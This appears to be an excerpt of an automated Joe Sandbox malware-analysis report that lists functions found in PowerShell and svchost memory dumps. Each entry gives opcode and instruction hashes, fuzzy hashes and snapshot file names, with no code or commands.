                                                                    • Opcode ID: aa03c9463b5913c81b37739082760b68653aa676a39c2e65e134d433123271a2
                                                                    • Instruction ID: 7e642bdf7a3a51c373a7aa36e2fdf3ee12989c82e45031baac46c376e84e9bc3
                                                                    • Opcode Fuzzy Hash: aa03c9463b5913c81b37739082760b68653aa676a39c2e65e134d433123271a2
                                                                    • Instruction Fuzzy Hash: 6051F67190DB885FD7199B689C0A6A9BFE0FF56310F0441AFD089C3293CB64B859C7D2
                                                                    Function 00007FF7C0BBEC60 Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1802520688.00007FF7C0BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0BBD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0bbd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d517fdffeaf3936b480db0e9f93c3194fb4c06e3b9d8808945cb52543a99492a
                                                                    • Instruction ID: f5fbb02fdce9088fed5cfcd55dab86592a3bcea709374d29521ad0c9d287962a
                                                                    • Opcode Fuzzy Hash: d517fdffeaf3936b480db0e9f93c3194fb4c06e3b9d8808945cb52543a99492a
                                                                    • Instruction Fuzzy Hash: 2B41263040DBC44FD7569F299C459523FB0EF56320B1502EFE489CB2A3D629A84AC7A2
                                                                    Function 00007FF7C0CDA545 Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ffc86cbd05c81bf1e7240f13df9aaa1ec477de6d94409b4378ca654d8477209b
                                                                    • Instruction ID: a930b78a1d138747631921da76c8fd5bbaad7a2739628c2f687d9f28e970974c
                                                                    • Opcode Fuzzy Hash: ffc86cbd05c81bf1e7240f13df9aaa1ec477de6d94409b4378ca654d8477209b
                                                                    • Instruction Fuzzy Hash: 9F21057190CB4C4FDB58DF5C984A6E97BF0EF9A320F04416FD048C7252DA74A40ACB91
                                                                    Function 00007FF7C0CDA0FB Relevance: .1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0bca4a2bf712f308d193225c910685bbf402ba1b29f5aaf3c27371149c38ff0
                                                                    • Instruction ID: c5f732658834d20c7f15bec782b730edf04532e330e800fe022a1968edbaae78
                                                                    • Opcode Fuzzy Hash: f0bca4a2bf712f308d193225c910685bbf402ba1b29f5aaf3c27371149c38ff0
                                                                    • Instruction Fuzzy Hash: B901D8A290D78D5FD702AB38AC357E57FA0EF63218F0902E7D589CB1A3D6185818C392
                                                                    Function 00007FF7C0CD33B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: 4f9f3889a377c08dcfde1f69c3270b95b9375c8996e9aaf60aacf75038a288f1
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: 9D01677115CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661DB36E882CB46
                                                                    Function 00007FF7C0DA414D Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64deb0c77d11845eec7416d412ecc8e9cde390c8af27e2647b2b19ccf0c95276
                                                                    • Instruction ID: e8b41b98a31ef8c8757a507f638b59c70e06a09a1193fee68fab2a9a14fbc636
                                                                    • Opcode Fuzzy Hash: 64deb0c77d11845eec7416d412ecc8e9cde390c8af27e2647b2b19ccf0c95276
                                                                    • Instruction Fuzzy Hash: 3CF0BE32A0C6088FD698EB0CE4004A8B3E0FF9433175500BAE05DC76A7CB25FC90C791
                                                                    Function 00007FF7C0DA4400 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6a6dd76d3be87a67d048fd824a29851edf069df4e886e779d189eb6509c2890c
                                                                    • Instruction ID: 339b4e574624027e319547f108c1a13ec1d02d36578fb02eddd587758bc85dca
                                                                    • Opcode Fuzzy Hash: 6a6dd76d3be87a67d048fd824a29851edf069df4e886e779d189eb6509c2890c
                                                                    • Instruction Fuzzy Hash: 47F0BE31A0C6488FD754EB0CE4405A8B3E0FF8832178500B6E049C7653CB69BC50C7A0
                                                                    Function 00007FF7C0DA41D1 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1804086232.00007FF7C0DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0da0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction ID: 2cda973fc30cbc659bbd4915eadeb9b986d903964666e6c6965fdc1df9e9fcf1
                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction Fuzzy Hash: 90E0123170C5048FD6A8EF0CE0409A9B3E1EB9833175101B7D14EC7661C721FC918BD0

                                                                    Non-executed Functions

                                                                    Function 00007FF7C0CD8BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1803256249.00007FF7C0CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ff7c0cd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                    • API String ID: 0-962139525
                                                                    • Opcode ID: 64d54649c1b082f21b48bcec0ea01dd949fe03042b20aeedb8b22134a012397b
                                                                    • Instruction ID: 94d4d80137daeca04db296451db6b4fc8de33b7b69e9b88188f85f441acbe872
                                                                    • Opcode Fuzzy Hash: 64d54649c1b082f21b48bcec0ea01dd949fe03042b20aeedb8b22134a012397b
                                                                    • Instruction Fuzzy Hash: 2621C5B36145158BD201366CBC42AD877C4DF643B938643F3E128CF253EA18749B8A85

                                                                    Executed Functions

                                                                    Function 00007FF7C0CF1719 Relevance: .7, Instructions: 709COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db2a96119584750e9104375963ad490beaff905d599d26285b8ef761d6306184
                                                                    • Instruction ID: c633d7ee07f099d994e304d6a63666710ed4fb10966cab25ef031cde8daeb4c5
                                                                    • Opcode Fuzzy Hash: db2a96119584750e9104375963ad490beaff905d599d26285b8ef761d6306184
                                                                    • Instruction Fuzzy Hash: C6229870E28A594FE798FB2844696B9B7D2FF88750F94457DD40EC33D2DE28B8418782
                                                                    Function 00007FF7C0CF20F1 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 50478f629f32df04c78cced5c6cc5202a9c4e3acc28eeafc84f7a635aadcf8f1
                                                                    • Instruction ID: a8406d2aa1f78e13aa88a4feb224bfc70e63fdccadc62427859985bda81a4c3d
                                                                    • Opcode Fuzzy Hash: 50478f629f32df04c78cced5c6cc5202a9c4e3acc28eeafc84f7a635aadcf8f1
                                                                    • Instruction Fuzzy Hash: 21513320A1DAC94FD796AB7C58342B9BFD5DF47265B0801FAE0C9C7293DE186C06C396
                                                                    Function 00007FF7C0CF0AD3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9L_^
                                                                    • API String ID: 0-1679237627
                                                                    • Opcode ID: 45ed4724ab7d60c6b2b10f2ec5a182f222c71128a21a8a3c9c9a4f2c548b24a5
                                                                    • Instruction ID: ba433d8c00c6e9ddaff7117c705d7e58adaca2e4218acc2ce851983efef73abc
                                                                    • Opcode Fuzzy Hash: 45ed4724ab7d60c6b2b10f2ec5a182f222c71128a21a8a3c9c9a4f2c548b24a5
                                                                    • Instruction Fuzzy Hash: 3C613675A0891A4FE701BBBCA8522FC77A0EF85365B94857AD10CC7393CF28B48687D5
                                                                    Function 00007FF7C0CF0E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4L_^
                                                                    • API String ID: 0-2524838182
                                                                    • Opcode ID: 211f06a8f9065acd6e948936422e6db4bbd347cc4e6203a1961a9fff3b7aeaac
                                                                    • Instruction ID: 890415eb19d2ac226e18b1a7dfe2b3c57587a68f2d7ce256b53e8ae9420ec0ff
                                                                    • Opcode Fuzzy Hash: 211f06a8f9065acd6e948936422e6db4bbd347cc4e6203a1961a9fff3b7aeaac
                                                                    • Instruction Fuzzy Hash: C8511821A1DA860FE366A77C58662F57FE1DF86270B4941FBD08DC7293DD1CAC428362
                                                                    Function 00007FF7C0CF1295 Relevance: .5, Instructions: 471COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9c4bf1780f5bdacacbed6b4c9b135cce8a6668a6d7bcab87cb03b5470ffc4fb
                                                                    • Instruction ID: ef8ab6ea2ecc05ff09e2ea78f087e9d65e4bf2cdbb753299b2e52407e80d49ac
                                                                    • Opcode Fuzzy Hash: a9c4bf1780f5bdacacbed6b4c9b135cce8a6668a6d7bcab87cb03b5470ffc4fb
                                                                    • Instruction Fuzzy Hash: 30210732A086554FD701FB7CE8622E9BBA0FF82365B444677C089DB293DF28741687D5
                                                                    Function 00007FF7C0CF0985 Relevance: .3, Instructions: 339COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f0d371eac3bfcd35ff04763b0faea21968d83a7087ce34df1deb3ff2ae4b0b1f
                                                                    • Instruction ID: ab002e40d03df4088d62d00c7f82b8109f134a8737e25c7dceae3719e08eb075
                                                                    • Opcode Fuzzy Hash: f0d371eac3bfcd35ff04763b0faea21968d83a7087ce34df1deb3ff2ae4b0b1f
                                                                    • Instruction Fuzzy Hash: B4A13576B08A164FD701BB7CB8562F97BA0EF863B1B544577C148CB293CA24B09AC7D1
                                                                    Function 00007FF7C0CF09D3 Relevance: .3, Instructions: 313COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aff140db947f641a48f2773ff48654bad6a834118dcc3210f34a892f2737b34c
                                                                    • Instruction ID: b512678ac84bcd776de97c89855cdfef48dcd59e115de191981d42d50b318ecd
                                                                    • Opcode Fuzzy Hash: aff140db947f641a48f2773ff48654bad6a834118dcc3210f34a892f2737b34c
                                                                    • Instruction Fuzzy Hash: E5914566B0891A4BD701BB7CB8562FD7BA0EF853B1B948577C148CB293CA24B097C7D1
                                                                    Function 00007FF7C0CF0A08 Relevance: .3, Instructions: 297COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8ea5a5ec3f47479a7f696c8b9792f5260bb29ce33e307b49f81a4661b9a3319b
                                                                    • Instruction ID: ac1e07ffa528ba6bdde1452d48a07092f1f2b9a5cad519c9165c2b051f666eda
                                                                    • Opcode Fuzzy Hash: 8ea5a5ec3f47479a7f696c8b9792f5260bb29ce33e307b49f81a4661b9a3319b
                                                                    • Instruction Fuzzy Hash: E8816676B0891A4BD701BB7CB8562FD7BA0EF853B1B54857BC108CB293CA24B096C7D1
                                                                    Function 00007FF7C0CF0A10 Relevance: .3, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a029cc1043ba971559b7b0b96600e0a84befa90493522aaf75f26c4f5e22927b
                                                                    • Instruction ID: e4ebe706f109bcd75d836d8f3cd8197e57b4234ee0e4f57ccdade410d07081b6
                                                                    • Opcode Fuzzy Hash: a029cc1043ba971559b7b0b96600e0a84befa90493522aaf75f26c4f5e22927b
                                                                    • Instruction Fuzzy Hash: 19815576B0891A4BD701BB7CB8162FD7BA4EF853B1B54857BC108CB293CA24B096C7D1
                                                                    Function 00007FF7C0CF0A48 Relevance: .3, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 513896c2f9bd20205297c23c9b381bd202aa72d621097bb52880eca7753ee535
                                                                    • Instruction ID: 5ba440bb5bb8d9222bd136c15958b1aee963597952aa83223e81d93e06f984b0
                                                                    • Opcode Fuzzy Hash: 513896c2f9bd20205297c23c9b381bd202aa72d621097bb52880eca7753ee535
                                                                    • Instruction Fuzzy Hash: BA714576B0891A4BD701BB7CB8562FD7BA4EF853B1B54867AD108C7293CA34B086C7D1
                                                                    Function 00007FF7C0CF0638 Relevance: .1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ddf63612c3d39a6526d59c9756105b50712e570672c9f5bb0a62d37872d9fe3
                                                                    • Instruction ID: 3ebb5e10137449304c24dec6ca2c4cf15e56a3f17983d245576abf618a93764b
                                                                    • Opcode Fuzzy Hash: 9ddf63612c3d39a6526d59c9756105b50712e570672c9f5bb0a62d37872d9fe3
                                                                    • Instruction Fuzzy Hash: B631B520B18D490FE798EB6C9469779B6C2EF99365F4402BEE40EC3293DE64AC428341
                                                                    Function 00007FF7C0CF0D21 Relevance: .1, Instructions: 128COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction ID: 214d573e6046248d1f216fa0e5bd2fe39fb2da46c0c8e9a21704af53be126d02
                                                                    • Opcode Fuzzy Hash: 1fd8bcad5b3637168a2c0577099f7fd069766d0b311cd2ffc7ffc1e7ad3764dd
                                                                    • Instruction Fuzzy Hash: 4A31A361B18A094FE744BBBC581A7FDB6D5EF98761F54427AE10DC3283DE28B8418392
                                                                    Function 00007FF7C0CF0BD3 Relevance: .1, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 925c0b63a7e916935e88b2744ee1b52ebef725115a0a4d3fc3c0ad710eb88d40
                                                                    • Instruction ID: 2ee1a9d00caafaf642bb0af510bf82006450214f4d2ffce95d0cac56cefb062a
                                                                    • Opcode Fuzzy Hash: 925c0b63a7e916935e88b2744ee1b52ebef725115a0a4d3fc3c0ad710eb88d40
                                                                    • Instruction Fuzzy Hash: 28419174A18A098FDB85FB6898656EDBBB1FF99310F904579D009C3382CE387845C792
                                                                    Function 00007FF7C0CF0858 Relevance: .1, Instructions: 88COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c458295cf272a97412469cb97af9a134979a2d63181c4e9b533bacd2a596d23
                                                                    • Instruction ID: 0c2b96640b1a63e0f1d5dbd4e237fcf2c5b62b7f712dae2af40d351cf8bc13e2
                                                                    • Opcode Fuzzy Hash: 1c458295cf272a97412469cb97af9a134979a2d63181c4e9b533bacd2a596d23
                                                                    • Instruction Fuzzy Hash: BF31A469A68A494FD385FB2898BA5B97FB1EF89300FC084B9D448C3397CE347854C752
                                                                    Function 00007FF7C0CF0870 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fd247f2460b7d14fb24e922ee533e975af4aa54dd23489725eb81358a997b4a9
                                                                    • Instruction ID: 9f0c4bf47be3d5478bde74d21477738ddeca014ec70c065618706abfb3ee7eb3
                                                                    • Opcode Fuzzy Hash: fd247f2460b7d14fb24e922ee533e975af4aa54dd23489725eb81358a997b4a9
                                                                    • Instruction Fuzzy Hash: 4E219669A68A494FD385FB2898B95B9BFB1EF89300FC084ADD409C3396CE347950C752
                                                                    Function 00007FF7C0CF22C1 Relevance: .0, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2266582175.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64a4adf4b748ed9e348bc3f7aec0c9a45a86192ee633577daaaec79b4d7aa756
                                                                    • Instruction ID: 669a63c08f8722382b6811c117046b77d9e9a6402b71df6f50a5ee80a09c91cb
                                                                    • Opcode Fuzzy Hash: 64a4adf4b748ed9e348bc3f7aec0c9a45a86192ee633577daaaec79b4d7aa756
                                                                    • Instruction Fuzzy Hash: 4C014E55D0DAC14FE791BB385875175BFE0DF91220B8804AAD988C72E7DD08B9858393

                                                                    Executed Functions

                                                                    Function 00007FF7C0CF1719 Relevance: .7, Instructions: 709COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b66fe35d612f21fcbec69b9ee6b2ea123a36b51ffe79132f2b8708056d4216de
                                                                    • Instruction ID: 5ecd87697e796f0ce4488a8b7b26e90a43581ded4cdace7da90d3a923977c9b2
                                                                    • Opcode Fuzzy Hash: b66fe35d612f21fcbec69b9ee6b2ea123a36b51ffe79132f2b8708056d4216de
                                                                    • Instruction Fuzzy Hash: 93229571F18A594FE798FB2884656B9B6D2FF98760F940579D40EC33D2DE28B8018782
                                                                    Function 00007FF7C0CF20F1 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 81905d87bd53e3d991ad51b58aab509a0ce191d88de2224e251f66dfaae81209
                                                                    • Instruction ID: 51409edc070a11a3df997a8b913f35ac37ebbf16ffb9ea7c6cde40de01ff3f8d
                                                                    • Opcode Fuzzy Hash: 81905d87bd53e3d991ad51b58aab509a0ce191d88de2224e251f66dfaae81209
                                                                    • Instruction Fuzzy Hash: BE513320A0D6C94FD756AB7C58242B9BFD5DF47265B0801FAE0C9C7293DE186C06C396
                                                                    Function 00007FF7C0CF0AD3 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 9L_^
                                                                    • API String ID: 0-1679237627
                                                                    • Opcode ID: 1470ca5af747991afb65030e25cc12d3b8d6f327e7b0f9a1ed53a1f7366b0305
                                                                    • Instruction ID: 7567357eeddaf67eb7a36ecdcee70468abc362981a8d1e329b9e605fe6ea05a7
                                                                    • Opcode Fuzzy Hash: 1470ca5af747991afb65030e25cc12d3b8d6f327e7b0f9a1ed53a1f7366b0305
                                                                    • Instruction Fuzzy Hash: FA610372A0891A4FE701BBBCA8522FD77A0EF88375B584676D108C7393CF28B44683D5
                                                                    Function 00007FF7C0CF0E8E Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4L_^
                                                                    • API String ID: 0-2524838182
                                                                    • Opcode ID: f8f1c731e92090427d3859ad2aebd259bc6be6dcf936f1d9db8237b82df66317
                                                                    • Instruction ID: 6c4e8c464f984ea29973f6aefee617561f5fb5ac5b6a42e2e3e7b899eb52330b
                                                                    • Opcode Fuzzy Hash: f8f1c731e92090427d3859ad2aebd259bc6be6dcf936f1d9db8237b82df66317
                                                                    • Instruction Fuzzy Hash: 16511821A0DA860FE366A77C58662F57FE1DF86270B0941FBD08DC7293DD1CAC428362
                                                                    Function 00007FF7C0CF1295 Relevance: .5, Instructions: 471COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000017.00000002.2361315261.00007FF7C0CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CF0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_23_2_7ff7c0cf0000_svchost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 347548c23a25fb313225d56d3f5221e3f172f2e6a62da66011ab54e3d7773714
                                                                    • Instruction ID: 097b02b72d6ec9b1951052cfcd56218b25e2415a6a07ef3f12430a79ec51e40f
                                                                    • Opcode Fuzzy Hash: 347548c23a25fb313225d56d3f5221e3f172f2e6a62da66011ab54e3d7773714
